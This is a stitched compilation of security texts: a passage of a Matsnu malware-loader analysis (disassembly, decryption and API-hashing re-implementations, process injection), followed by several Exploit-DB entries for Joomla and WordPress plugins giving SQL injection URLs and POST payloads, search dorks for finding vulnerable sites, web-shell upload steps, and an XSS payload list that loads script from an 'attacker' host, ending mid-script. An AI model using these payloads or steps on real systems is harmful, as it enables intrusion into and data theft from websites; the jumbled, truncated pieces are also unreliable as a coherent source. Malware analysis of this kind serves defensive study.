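            edx = (edx & 0xFFFF0000) | dx
            # IMUL EDX, EDX, 3: full 32-bit multiply, result truncated
            edx = (edx * 3) & 0xFFFFFFFF
            # NOT DX: complement only the low word
            edx = (edx & 0xFFFF0000) | (~edx & 0xFFFF)
            edx = ror32(edx, 7)
            saved = edx                 # MOV DWORD PTR SS:[EBP+10], EDX
        out.append(edx & 0xFF)          # XOR BYTE PTR DS:[EAX], DL
        edx = ror32(edx, 8)             # ROR EDX, 8
    return bytes(out)


def matsnu_decrypt(buf: bytes, edx: int, saved: int) -> bytes:
    """XOR `buf` with the keystream; calling it again with the same key
    material re-encrypts, since XOR is its own inverse."""
    keystream = matsnu_keystream(len(buf), edx, saved)
    return bytes(b ^ k for b, k in zip(buf, keystream))


if __name__ == "__main__":
    # Constructed sample: a fake DOS stub encrypted with arbitrary key values,
    # standing in for the 3DD1 bytes the loader decrypts at 002D4349.
    plain = b"MZ\x90\x00This program cannot be run in DOS mode"
    blob = matsnu_decrypt(plain, edx=0x1234ABCD, saved=0x0BADF00D)
    assert matsnu_decrypt(blob, 0x1234ABCD, 0x0BADF00D) == plain
    print(blob.hex())
```

With a real dump, the two key parameters are read from EDX and [EBP+10] at the first breakpoint on 0040896E, and `count` is the ECX value there (3DD1 in this sample).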
Going Through the Third Stage of the Loader

We can now start working on the UPX packed file we extracted from the loader's memory during the previous part of the analysis. Manually unpacking a UPX packed file is quite trivial, so I am not going to dedicate any more lines to UPX. Instead I will continue with the analysis of the code of the malware's loader.

    0040E5D4 55                 PUSH EBP                      ← OEP
    0040E5D5 89E5               MOV EBP, ESP
    0040E5D7 81EC 34020000      SUB ESP, 234
    0040E5DD C745 CC 0000000    MOV DWORD PTR SS:[EBP-34], 0
    0040E5E4 C745 D0 0000000    MOV DWORD PTR SS:[EBP-30], 0
    0040E5EB C745 D4 0000000    MOV DWORD PTR SS:[EBP-2C], 0

A few instructions later, we observe an attempt to detect whether the malware is currently running inside a sandbox. I can't tell which sandbox the author tested the following trick against, but here is how it is implemented. It pushes on the stack the absolute path of the directory in which it is located, then pushes on the stack the string "sand-box". Finally, it uses the strstr function to check whether the absolute path contains this substring.

SandBox check:

    0040E666 51                 PUSH ECX
    0040E667 50                 PUSH EAX
    0040E668 FF15 AAF84000      CALL ntdll.strstr

Stack View:

    0006FD4C 0006FD54  s1 = "c:\users\r.c.e\desktop\matsui\upx_packed_decrypted.pe"
    0006FD50 0006FF70  s2 = "sand-box"

If the check described above succeeds, the process will terminate. During this stage, the loader will first copy the imports table from one location to another, and then it will attempt to create a child process and inject a thread into it. If you look a few instructions later, you will notice a few calls to the memcpy function through which the copies of the imports table are created. Once the imports table is copied, there is a CALL to a function at address 0040E6F8. This function is dedicated to the creation of the child process, and it also calls another function dedicated to the injection of the malicious thread.
In the next part, I am going to demonstrate two ways to keep control of the execution of the injected code on the new thread, which is set to run immediately after creation.

Keep Control on Injected Threads

By entering the function from the CALL mentioned above, we can see the piece of code that launches the child process in suspended mode.

    0040E808 56                 PUSH ESI
    0040E809 57                 PUSH EDI
    0040E80A 6A 00              PUSH 0
    0040E80C 6A 00              PUSH 0
    0040E80E 6A 04              PUSH 4
    0040E810 6A 00              PUSH 0
    0040E812 6A 00              PUSH 0
    0040E814 6A 00              PUSH 0
    0040E816 50                 PUSH EAX
    0040E817 6A 00              PUSH 0
    0040E819 FF15 E4F14000      CALL kernel32.CreateProcessA

Stack View:

    0006FC6C 00000000 |ModuleFileName = NULL
    0006FC70 00403DB9 |CommandLine = "svchost.exe"
    0006FC74 00000000 |pProcessSecurity = NULL
    0006FC78 00000000 |pThreadSecurity = NULL
    0006FC7C 00000000 |InheritHandles = FALSE
    0006FC80 00000004 |CreationFlags = CREATE_SUSPENDED
    0006FC84 00000000 |pEnvironment = NULL
    0006FC88 00000000 |CurrentDir = NULL
    0006FC8C 0006FCA0 |pStartupInfo = 0006FCA0
    0006FC90 0006FCE4 \pProcessInfo = 0006FCE4

As you can see, the author chooses to launch svchost.exe as the child process, a name that wouldn't make a user suspicious when looking at the process names in the task manager (or any other process enumeration tool). At this point we need to know the PID of the child process that is going to be created, which we can retrieve from the PROCESS_INFORMATION structure once the child process has been created. Because there will be more than one process with that name on Windows, we need to know which one was created by the loader of the malware in order to attach to that one later. A few lines later, at address 0040E828, it will CALL the function dedicated to the injection of the malicious thread. It will first allocate some extra memory in the child process, which is still in suspended mode.
    0040E847 C745 F9 0000000    MOV DWORD PTR SS:[EBP-7], 0
    0040E84E 6A 40              PUSH 40
    0040E850 68 00301000        PUSH 103000
    0040E855 68 D4D50000        PUSH 0D5D4
    0040E85A 6A 00              PUSH 0
    0040E85C FF75 08            PUSH DWORD PTR SS:[EBP+8]
    0040E85F FF15 A8F14000      CALL kernel32.VirtualAllocEx

Then it will use the WriteProcessMemory API to inject the code into the allocated memory area inside the child process.

    0040E874 51                 PUSH ECX
    0040E875 68 D4D50000        PUSH 0D5D4
    0040E87A 56                 PUSH ESI
    0040E87B FF75 E8            PUSH DWORD PTR SS:[EBP-18]
    0040E87E FF75 08            PUSH DWORD PTR SS:[EBP+8]
    0040E881 FF15 B4F14000      CALL kernel32.WriteProcessMemory

Stack View:

    0006FC54 00000038 |hProcess = 00000038 (window)
    0006FC58 7FFA0000 |Address = 7FFA0000
    0006FC5C 00401000 |Buffer = UPX_pack.00401000
    0006FC60 0000D5D4 |BytesToWrite = D5D4 (54740.)
    0006FC64 0006FC68 \pBytesWritten = 0006FC68

Method 1 – Injecting an Infinite Loop

As you can see above, the start address of the buffer that is going to be copied to the child process is 00401000. So, at this point, since we don't want to miss the execution of the thread, we can go to the buffer and change (in this case) the first 2 bytes from 5589 to EBFE (which corresponds to a jump instruction that jumps back to itself). In this way, we create an infinite loop. Finally, the loader will start the injected thread, but remember, we have set an infinite loop at the beginning of it.

    0040E88A 50                 PUSH EAX
    0040E88B 6A 00              PUSH 0
    0040E88D 6A 00              PUSH 0
    0040E88F FF75 E8            PUSH DWORD PTR SS:[EBP-18]
    0040E892 6A 00              PUSH 0
    0040E894 6A 00              PUSH 0
    0040E896 FF75 08            PUSH DWORD PTR SS:[EBP+8]
    0040E899 FF15 B8F14000      CALL kernel32.CreateRemoteThread

Once this step is done, we can attach to the child process and analyse the injected thread, which keeps looping over its first instruction. Then we can go there and take control of it in order to restore the two original bytes.
Method 2 – Modify EP & Memory Dump

Another trick that we can use in this case is to wait for the loader to copy the imports table (as seen previously during the explanation of the first method). But instead of letting the loader copy the code starting from address 00401000 to the child process, we can set the entry point there, dump, and fix the imports, as we normally do during manual unpacking. In this case the technique is safe primarily because the code of the injected thread needs to be stand-alone in the context of the process address space in which it runs. In other words, since this piece of code is injected inside the address space of another process, it cannot rely on the memory alignment of the other modules, their image base, etc. So it is safe to set the entry point at address 00401000 once the imports are copied, and just dump from there and save it as a new executable file.

Conclusion

The behaviour of the loader examined in this article is very similar to that of the most common loaders used nowadays by various types of malware, such as ransomware, fake AVs, etc. Keep in mind that in most cases the loader will at some point make use of at least one of the following three APIs: VirtualAlloc, VirtualAllocEx, or ZwAllocateVirtualMemory. So it is good practice to keep an eye on them and on the memory area(s) allocated through them.

Original Article
-
The AV industry is growing every day, along with the underground industry that produces all types of malware, from simple file infectors to more sophisticated Trojans that are able to gather and send sensitive information to the bad guys. The fight between AV companies and malware authors is getting bigger every single day. Both good and bad guys dedicate a lot of time to researching and implementing ways to detect, and ways to avoid detection (depending on which side these people are on). Most malware research is usually concentrated on the infection mechanisms of the malware. Other points of focus include the techniques the malware uses to communicate with its creator, while the anti-virus evasion techniques the malware used to get in in the first place are often skipped over entirely. This article aims to dig inside the loader used by the Matsnu malware family in order to deploy itself and avoid detection by AV products. Fortunately, at this point the variant is already detected by most AV vendors.

In my job as a malware analyst, I very often hear this kind of AV evasion technique described as a "packer". In a very abstract way this might be true, but in a technical way it really isn't. From my experience with packers and manual unpacking, I expect a packer to incorporate some compression algorithm and most probably an encryption algorithm (custom or not). Furthermore, the behaviour of a packer is usually a lot different: a packer will usually decompress and decrypt the code of the original executable and then jump to its original entry point (OEP). On the other hand, I prefer to call these "packers", used by more and more malware authors, loaders, because of the technical details. These loaders will usually launch a child process in suspended mode, overwrite its memory with the decrypted code of the malware, and then resume its main thread.
Some of them might then choose to allocate some extra memory in the child process, instead of overwriting its memory, and insert the decrypted viral code there. Additionally, such a loader might then inject a thread into the child process with its starting address at the beginning of the allocated memory where the viral code is placed. Others might overwrite themselves through a code stub written into an extra chunk of allocated memory and then jump back into the PE image address space. In addition, very often the malware authors will choose to first compress the original viral code using a common packer (such as UPX, PECompact etc.), then encrypt it and incorporate it inside the loader. From a technical point of view it is quite fair to distinguish these two types of mechanisms, and even if we keep calling them all "packers" for simplicity, it is necessary to understand the differences between them. The final goal of this article is to isolate a fully working executable of the original malware from under the various anti-AV protection layers.

Self-Decryption Stage I

A big part of the code of the loader is decrypted at run-time through a "slow" decryption algorithm which does a lot of operations in each loop, decrypting the code dword by dword.
The outer loop:

    00401752 8B4D F0            MOV ECX, DWORD PTR SS:[EBP-10]
    00401755 83C1 01            ADD ECX, 1
    00401758 894D F0            MOV DWORD PTR SS:[EBP-10], ECX
    0040175B 817D F0 688E0      CMP DWORD PTR SS:[EBP-10], 28E68    ← check counter
    00401762 7D 5E              JGE SHORT 004017C2                   ← exit the loop once finished
    ...more code here
    0040178F E8 D7040000        CALL 00401C6B                        ← call to the decryption routine
    ...more code here
    004017C0 EB 90              JMP SHORT 00401752                   ← jump up to loop start

Inside the Decryption Routine:

Some additional loops take place here, but the important instruction is the one that actually writes, each time, the resulting dword stored in the ECX register to the memory location pointed to by the EAX register:

    00401ED8 8908               MOV DWORD PTR DS:[EAX], ECX          ← initial value in EAX is 00408584; it is incremented by a dword in each iteration

Self-Decryption Stage II

When the outer loop mentioned above has finished, another one takes place a few instructions later.

    004017DE 8B4D E0            MOV ECX, DWORD PTR SS:[EBP-20]
    004017E1 83C1 05            ADD ECX, 5
    004017E4 894D E0            MOV DWORD PTR SS:[EBP-20], ECX
    004017E7 817D E0 DF0C0      CMP DWORD PTR SS:[EBP-20], 0CDF      ← check counter
    004017EE 7D 77              JGE SHORT 00401867                   ← exit the loop
    ...more code here
    00401862 E9 77FFFFFF        JMP 004017DE                         ← jump up to loop start

Self-Decryption Stage III

There is one more loop coming next during the self-decryption stage.

    0040187E BA 01000000        MOV EDX, 1
    00401883 85D2               TEST EDX, EDX
    00401885 0F84 D2000000      JE 0040195D

The three instructions above create a fake execution flow redirection. In fact, since the value 1 is always passed to the EDX register, after performing the TEST instruction on the same register, the conditional JE jump that follows will never have any effect on the execution flow.
    0040188B 817D F0 688E0      CMP DWORD PTR SS:[EBP-10], 28E68    ← check counter
    00401892 0F85 A1000000      JNZ 00401939                         ← if not equal, jump to increase_counter

Some more code is presented below:

    increase_counter:
    00401939 8B4D F0            MOV ECX, DWORD PTR SS:[EBP-10]
    0040193C 83C1 01            ADD ECX, 1
    0040193F 894D F0            MOV DWORD PTR SS:[EBP-10], ECX
    enter_next_decryption_routine:
    00401942 68 F7480700        PUSH 748F7
    00401947 68 18194F00        PUSH 4F1918
    0040194C 8B55 F4            MOV EDX, DWORD PTR SS:[EBP-C]
    0040194F 52                 PUSH EDX
    00401950 E8 4A000000        CALL 0040199F                        ← call decryption routine
    00401955 83C4 0C            ADD ESP, 0C
    00401958 E9 21FFFFFF        JMP 0040187E                         ← jump to loop start

Inside the Decryption Routine:

Some more loops take place here, but the important instruction is the one that actually writes, each time, the resulting dword stored in the ECX register to the memory location pointed to by the EAX register:

    00401B70 8908               MOV DWORD PTR DS:[EAX], ECX          ← initial value in EAX is 00408584; it is incremented by a dword in each iteration

Self-Decryption Stage IV

Going back to the loop outside the decryption function, we saw the condition which would normally signal the end of the looping process. It is fake, and we need to examine it more carefully in order to locate the next step. Indeed, when the conditions are right, execution will reach a CALL instruction:

    0040191D E8 8FF8FFFF        CALL 004011B1

The CALL to the beginning of the previously encrypted code is located inside this function:

    004013B6 FF15 108B4000      CALL NEAR DWORD PTR DS:[408B10]      ← the value stored at this address is 00408584

Once we enter the function at address 00408584 we see the following:

    00408584 E8 07000000        CALL 00408590
    00408589 75 3A              JNZ SHORT 004085C5

Note the obfuscation trick in the first instruction, which confuses the disassembling engine. In fact, the CALL instruction will bring execution to the last byte of the instruction starting at address 0040858B, which means that all the bytes in between are junk bytes in this case.
    0040858B 03A0 21D64F5B      ADD ESP, DWORD PTR DS:[EAX+5B4FD621]
    00408591 81EB 05103A00      SUB EBX, 3A1005
    00408597 8DB3 2E103A00      LEA ESI, DWORD PTR DS:[EBX+3A102E]
    0040859D B9 8B020000        MOV ECX, 28B
    004085A2 66BF 7592          MOV DI, 9275
    004085A6 66313E             XOR WORD PTR DS:[ESI], DI
    004085A9 6683C7 02          ADD DI, 2
    004085AD 83C6 02            ADD ESI, 2
    004085B0 E2 F4              LOOPD SHORT 004085A6
    004085B2 FC                 CLD
    004085B3 7E 2A              JLE SHORT 004085DF
    004085B5 1B95 CFF6215C      SBB EDX, DWORD PTR SS:[EBP+5C21F6CF]
    004085BB 8745 92            XCHG DWORD PTR SS:[EBP-6E], EAX
    004085BE D7                 XLAT BYTE PTR DS:[EBX+AL]
    004085BF 1F                 POP DS
    004085C0 30D5               XOR CH, DL
    004085C2 94                 XCHG EAX, ESP

This is what we see once we execute the CALL instruction:

    00408590 5B                 POP EBX
    00408591 81EB 05103A00      SUB EBX, 3A1005
    00408597 8DB3 2E103A00      LEA ESI, DWORD PTR DS:[EBX+3A102E]   ← starts from address 004085B2
    0040859D B9 8B020000        MOV ECX, 28B                         ← loop counter
    004085A2 66BF 7592          MOV DI, 9275                         ← decryption key
    004085A6 66313E             XOR WORD PTR DS:[ESI], DI            ← decrypt one word per iteration by XORing with the key, which starts at 9275 and is incremented by 2 after each word
    004085A9 6683C7 02          ADD DI, 2
    004085AD 83C6 02            ADD ESI, 2
    004085B0 E2 F4              LOOPD SHORT 004085A6

The above decryption algorithm will decrypt an extra portion of code starting from the instruction located immediately after the LOOPD. So, at this point we have seen the various steps used by this loader to decrypt the next parts of its code. Now it's time to continue with the rest of its mechanisms.

Dynamic Imports Resolving & PEB Loader Data Structure

Normally, malware authors retrieve the VAs of the APIs by using two Windows APIs, LoadLibrary and GetProcAddress. These are employed in order to avoid detection through the imports normally listed inside the imports table. However, in this case the author of the loader has decided to go through the PEB (Process Environment Block) Loader Data Structure, PEB_LDR_DATA, in order to retrieve the necessary information, which is a stealthier way to retrieve the VAs of the necessary APIs.
The pointer to this structure is located at PEB + 0x0C. Back to where we stopped: immediately after the end of the decryption loop we locate a CALL at address 004085CD, and by entering this function we see another CALL at address 004086EF; inside that function is where the loader of the malware will access the PEB_LDR_DATA structure.

    0040870E 64FF35 3000000     PUSH DWORD PTR FS:[30]
    00408715 58                 POP EAX

In the two instructions above, we notice another obfuscation attempt. Instead of pushing the address of the PEB onto the stack and then popping that value back into EAX, it could just do MOV EAX, DWORD PTR FS:[30].

    00408716 8B40 0C            MOV EAX, DWORD PTR DS:[EAX+C]        ← move to EAX the pointer to PEB_LDR_DATA
    00408719 8B48 0C            MOV ECX, DWORD PTR DS:[EAX+C]        ← move to ECX the pointer to the LDR_MODULE structure of the first module loaded by the Windows loader
    0040871C 8B11               MOV EDX, DWORD PTR DS:[ECX]          ← save to EDX the pointer to the LDR_MODULE structure of the next module loaded by the Windows loader
    0040871E 8B41 30            MOV EAX, DWORD PTR DS:[ECX+30]       ← move to EAX the pointer to the name of the first module loaded by the Windows loader

Then follows another CALL at address 00408728, to a function dedicated to calculating a magic dword from the name of the currently examined module. If the dword matches the predefined constant, then the loader knows it has found the loaded module it needs to continue its mechanisms.
Calculation Algorithm:

    00408797 8A10               MOV DL, BYTE PTR DS:[EAX]            ← go through all chars one by one
    00408799 80CA 60            OR DL, 60                            ← start dword calculation
    0040879C 01D3               ADD EBX, EDX
    0040879E D1E3               SHL EBX, 1                           ← end dword calculation
    004087A0 0345 10            ADD EAX, DWORD PTR SS:[EBP+10]       ← increase the pointer to the name string by 2, because it's stored as Unicode
    004087A3 8A08               MOV CL, BYTE PTR DS:[EAX]            ← move next char value to CL
    004087A5 84C9               TEST CL, CL                          ← check if it's zero, which means we reached the end of the string
    004087A7 E0 EE              LOOPDNE SHORT 00408797               ← if it's not, jump up to loop for the next char
    004087A9 31C0               XOR EAX, EAX                         ← zero out EAX
    004087AB 8B4D 0C            MOV ECX, DWORD PTR SS:[EBP+C]        ← move the magic dword to ECX
    004087AE 39CB               CMP EBX, ECX                         ← check if calculated dword = magic dword
    004087B0 74 01              JE SHORT 004087B3                    ← if it is, module located
    004087B2 40                 INC EAX
    004087B3 5A                 POP EDX
    004087B4 5B                 POP EBX
    004087B5 59                 POP ECX
    004087B6 89EC               MOV ESP, EBP
    004087B8 5D                 POP EBP
    004087B9 C2 0C00            RET 0C

The figure that follows demonstrates the condition in which the two values match when checking the kernel32.dll loaded module.

Once the necessary module is located, we reach the next part of the code, which will attempt to find the VAs of specific exported functions of kernel32.dll after exiting from the previous function.

    00408735 8B41 18            MOV EAX, DWORD PTR DS:[ECX+18]       ← get the image base of kernel32.dll from the LDR_MODULE structure
    00408738 50                 PUSH EAX
    00408739 8B58 3C            MOV EBX, DWORD PTR DS:[EAX+3C]       ← get the offset of its PE Header
    0040873C 01D8               ADD EAX, EBX
    0040873E 8B58 78            MOV EBX, DWORD PTR DS:[EAX+78]       ← get the RVA of its Export Table

Once the loader of the malware locates the export table of kernel32.dll, it will use it in order to retrieve the VAs of a few APIs, four in total, necessary to proceed.
Here is the table that is created at this stage:

    00408AA5 760CBC8B kernel32.LoadLibraryExA
    00408AA9 760D05F4 kernel32.VirtualAlloc
    00408AAD 760C50AB kernel32.VirtualProtect
    00408AB1 760D1837 kernel32.GetProcAddress

In the next instalment, I will begin by showing how to Locate and Isolate the Embedded Decrypted Executable. Have fun!

Original Article
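As an added example (not the loader's code and not from the original article), the module-name hash computed by the loop at 00408797 is re-implemented in Python below, together with a small lookup that resolves a magic dword recovered from a sample back to a module name from a candidate list. Two details are not visible in the listing and are assumed here: EBX starts at 0, and the upper 24 bits of EDX are clear when each character byte is added; the candidate list is constructed.

```python
from typing import Iterable, Optional

# Added example, not the loader's own code: the module-name hash from the
# loop at 00408797-0040879E, plus a lookup that turns a recovered "magic
# dword" back into a module name. Assumptions (not visible in the listing):
# EBX starts at 0, and the upper 24 bits of EDX are zero when DL is added.

# Constructed candidate list of module names the loader might walk in the PEB.
COMMON_MODULES = ["ntdll.dll", "kernel32.dll", "kernelbase.dll",
                  "user32.dll", "advapi32.dll", "ws2_32.dll", "wininet.dll"]


def module_name_hash(name: str, seed: int = 0) -> int:
    """Hash `name` as the loader does before comparing it with the magic dword.

    The LDR_MODULE name is UTF-16; the loader advances its pointer by 2 per
    step and reads only the low byte of each code unit. For each char:
        DL  = char | 0x60        (folds A-Z to a-z, so the hash is case-insensitive)
        EBX = (EBX + EDX) << 1   (32-bit, so long names wrap around)
    The loop stops when the *next* byte is NUL (TEST CL, CL / LOOPDNE).
    """
    ebx = seed & 0xFFFFFFFF
    low_bytes = name.encode("utf-16-le")[::2]   # low byte of each code unit
    for ch in low_bytes:
        if ch == 0:                              # end of the Unicode string
            break
        ebx = ((ebx + (ch | 0x60)) << 1) & 0xFFFFFFFF
    return ebx


def resolve_module_hash(magic: int,
                        candidates: Iterable[str] = COMMON_MODULES) -> Optional[str]:
    """Return the first candidate whose hash equals `magic`, or None.

    Use this when a sample carries only the constant pushed before the CALL
    at 00408728 and you want to know which module the loader looks for.
    """
    for name in candidates:
        if module_name_hash(name) == magic:
            return name
    return None


if __name__ == "__main__":
    for name in COMMON_MODULES:
        print(f"{module_name_hash(name):08X}  {name}")
```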
-
Joomla FireBoard Component (com_fireboard) SQL Injection Vulnerability

EDB-ID: 20390 | CVE: N/A | OSVDB-ID: N/A
Author: Vulnerability-Lab | Published: 2012-08-09 | Verified:
Exploit Code: | Vulnerable App: N/A

Title:
======
Joomla com_fireboard - SQL Injection Vulnerability

Date:
=====
2012-07-11

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=655

VL-ID:
=====
655

Common Vulnerability Scoring System:
====================================
7.3

Introduction:
=============
Joomla is a free and open source content management system (CMS) for publishing content on the World Wide Web and intranets and a model-view-controller (MVC) Web application framework that can also be used independently. Joomla is written in PHP, uses object-oriented programming (OOP) techniques and software design patterns, stores data in a MySQL database, and includes features such as page caching, RSS feeds, printable versions of pages, news flashes, blogs, polls, search, and support for language internationalization. Joomla had been downloaded 23 million times. Between March 2007 and February 2011 there had been more than 21 million downloads. As of November 2011, there are over 8,600 free and commercial extensions available from the official Joomla! Extension Directory and more available from other sources.

(Copy of the Vendor Homepage: http://en.wikipedia.org/wiki/Joomla)

Abstract:
=========
The Laboratory Researcher (Nafsh) Ehram Shahmohamadi (sec-lab.ir) discovered a SQL Injection Vulnerability in the com_fireboard module of the Joomla CMS.
Report-Timeline:
================
2012-07-11: Public or Non-Public Disclosure

Status:
========
Published

Exploitation-Technique:
=======================
Remote

Severity:
=========
High

Details:
========
A SQL Injection vulnerability is detected in the com_fireboard module of the Joomla Content Management System. Remote attackers and low-privileged user accounts can execute/inject their own SQL commands to compromise the application DBMS. The vulnerability is located in the com_fireboard module, with the bound vulnerable func fb_ parameter. Successful exploitation of the vulnerability results in DBMS (server) or application (web) compromise.

Vulnerable Module(s):
[+] index.php?option=com_fireboard

Vulnerable Parameter(s):
[+] func fb_

Proof of Concept:
=================
The SQL injection vulnerability can be exploited by remote attackers without user interaction and with a low-privileged user account. For demonstration or reproduction ...

Dork(s):
inurl:"id=" & intext:"/com_fireboard/"

PoC:
http://[TARGET]/index.php?option=com_fireboard&Itemid=0&id=1&catid=0&func=fb_pdf'[SQL-INJECTION]

Reference(s):
xxx.com/index.php?option=com_fireboard&Itemid=0&id=1&catid=5&func=fb_pdf'[SQL-INJECTION]
xxx.com/2012/index.php?option=com_fireboard&Itemid=79&id=1&catid=2&func=fb_pdf'[SQL-INJECTION]
xxx.com/fireboard/index.php?option=com_fireboard&Itemid=38&id=22111&catid=16&func=fb_pdf'[SQL-INJECTION]
xxx.com/board/index.php?option=com_fireboard&Itemid=54&id=70122&catid=12&func=fb_pdf'[SQL-INJECTION]
xxx.com/jmfireboard/index.php?option=com_fireboard&Itemid=54&id=70122&catid=12&func=fb_pdf'[SQL-INJECTION]

Risk:
=====
The security risk of the remote SQL injection vulnerability is estimated as high(+).

Credits:
========
Nafsh - Ehram Shahmohamadi - (research@sec-lab.ir) [www.sec-lab.ir] - TEAM K0242

Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty.
Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register
Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com
Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission.
Copyright © 2012 | Vulnerability Laboratory

--
VULNERABILITY RESEARCH LABORATORY
LABORATORY RESEARCH TEAM
CONTACT: research@vulnerability-lab.com

Source
-
Joomla joomgalaxy 1.2.0.4 Multiple Vulnerabilities

EDB-ID: 20197 | CVE: N/A | OSVDB-ID: N/A
Author: D4NB4R | Published: 2012-08-02 | Verified:
Exploit Code: | Vulnerable App: N/A

_______________________________________________________________________________________

Exploit Title: Joomla joomgalaxy 1.2.0.4 Multiple Vulnerabilities
dork: inurl:com_joomgalaxy
Date: [01-08-2012]
Author: Daniel Barragan "D4NB4R"
Twitter: @D4NB4R
site: http://poisonsecurity.wordpress.com/
Vendor: http://www.joomgalaxy.com/
Version: 1.2.0.4 (last update on Jul 27, 2012)
License: Commercial $149 US
Demo: http://joomgalaxy.com/demo/
Tested on: [Linux(bt5)-Windows(7ultimate)]

Joomgalaxy is a rich, comprehensive directory component brimming with unique features like Entry comparison, Pay per download, Tagging, Email Cloaking, Review and Rating with Multiple Attributes, add Articles to Entries, with many more plus all standard directory features as well.

1. Unrestricted File Upload

1a. Go to this route, complete the form and log in to the site:
http://site/index.php?option=com_users&view=registration

1b. Go to the following link and create a new post (sometimes it asks for confirmation from an administrator), so create the post with a bit of social engineering and wait for the confirmation; if not required, skip this step:
http://site/index.php?option=com_joomgalaxy&view=addentry

1c. Once the post is published, go to the images tab and upload your shell in the following way: shell.php.jpg

1d.
Find your shell in the path:
http://site/administrator/components/com_joomgalaxy/assets/images/Image_gallery/randomid_shell.php.jpg

2. SQL Injection

p0c:
http://site/index.php?option=com_joomgalaxy&view=categorylist&type=thumbnail?=en&catid=100000001-100000001=0 union (select 1,database(),3,4,5,6,7,8,9,10,11,12,13)

Gretz: devboot, P1l0tcast, ksha, dedalo, etc..

I am not responsible for the use this is given.

_______________________________________________________________________________________
Daniel Barragan "D4NB4R" 2012

Source
-
WordPress Mz-jajak plugin <= 2.1 SQL Injection Vulnerability

EDB-ID: 20416 | CVE: N/A | OSVDB-ID: N/A
Author: StRoNiX | Published: 2012-08-10 | Verified:
Exploit Code: | Vulnerable App:

# Exploit Title: WordPress Mz-jajak plugin <= 2.1 SQL Injection Vulnerability
# Date: 2012-08-10
# Author: StRoNiX
# E-mail: hacker@hotmail.rs
# Software Link: http://downloads.wordpress.org/plugin/mz-jajak.zip
# Version: 2.1 (tested)

---------------
PoC (POST data)
---------------

POST /index.php HTTP/1.1
User-Agent: Mozilla
Host: example.com
Accept: */*
Referer: http://example.com/?page_id=9
Connection: Keep-Alive
Content-Length: 111
Content-Type: application/x-www-form-urlencoded

answer=1&formvote=Y&id=1 AND 1=0 UNION ALL SELECT 1,2,version(),user(),5,6,7,8,9,10,11,12,13,14,15--+&x=10&y=12

---------------
Vulnerable code
---------------

$id=$_POST['id'];
...
$query = $wpdb->query("UPDATE " . $table_name . " SET ".$answert."=".$answert."+1 WHERE id=".$id);
}
$rows = $wpdb->get_results("SELECT * FROM " . $table_name . " WHERE id=".$id);

###########################################################
Greetz: T0r3x, m1l05, JuMp-Er, EsC, UNICORN, Xermes, s4r4d0
----------------------------snip--------------------------------------
Thanks,
~StRoNiX

Source
-
Wordpress SimpleMail Plugin 1.0.6 Stored XSS

EDB-ID: 20361 | CVE: 2012-2579 | OSVDB-ID: N/A
Author: loneferret | Published: 2012-08-08

#!/usr/bin/python
'''
Author: loneferret of Offensive Security
Product: SimpleMail
Version: 1.0.6 (free version)
Vendor Site: http://codecanyon.net/item/wp-simplemail/1130008?ref=tinsley
Software Download: http://wordpress.org/extend/plugins/wp-simplemail/

Timeline:
29 May 2012: Vulnerability reported to CERT
30 May 2012: Response received from CERT with disclosure date set to 20 Jul 2012
23 Jul 2012: Update from CERT: No response from vendor
08 Aug 2012: Public Disclosure

Installed On: Ubuntu LAMP 8.04
Wordpress: 3.3.1
Client Test OS: MAC OS Lion
Browser Used: Firefox 12

Injection Points: To, From, Date, Subject
Injection Payload(s):
1: ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}
2: <SCRIPT>alert('XSS')</SCRIPT>
3: <SCRIPT SRC=http://attacker/xss.js></SCRIPT>
4: <SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
5: <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
6: <SCRIPT SRC="http://attacker/xss.jpg"></SCRIPT>
7: </TITLE><SCRIPT>alert("XSS");</SCRIPT>
8: <SCRIPT SRC=//attacker/.j>
9: <<SCRIPT>alert("XSS");//<</SCRIPT>
10: <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
11: <SCRIPT a=">" SRC="http://attacker/xss.js"></SCRIPT>
12: <SCRIPT ="blah" SRC="http://attacker/xss.js"></SCRIPT>
13: <SCRIPT a="blah" '' SRC="http://attacker/xss.js"></SCRIPT>
14: <SCRIPT "a='>'" SRC="http://attacker/xss.js"></SCRIPT>
15: <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://attacker/xss.js"></SCRIPT>
16: <SCRIPT a=">'>" SRC="http://attacker/xss.js"></SCRIPT>
'''

import smtplib

payload = """<SCRIPT>alert('XSS')</SCRIPT>"""


def sendMail(dstemail, frmemail, smtpsrv, username, password):
    # The payload is appended to the From header, one of the injection points listed above.
    msg = "From: hacker@offsec.local" + payload + "\n"
    msg += "To: victim@victim.local\n"
    msg += 'Date: Today\r\n'
    msg += "Subject: Offensive Security\n"
    msg += "Content-type: text/html\n\n"
    msg += "XSS\r\n\r\n"
    server = smtplib.SMTP(smtpsrv)
    server.login(username, password)
    try:
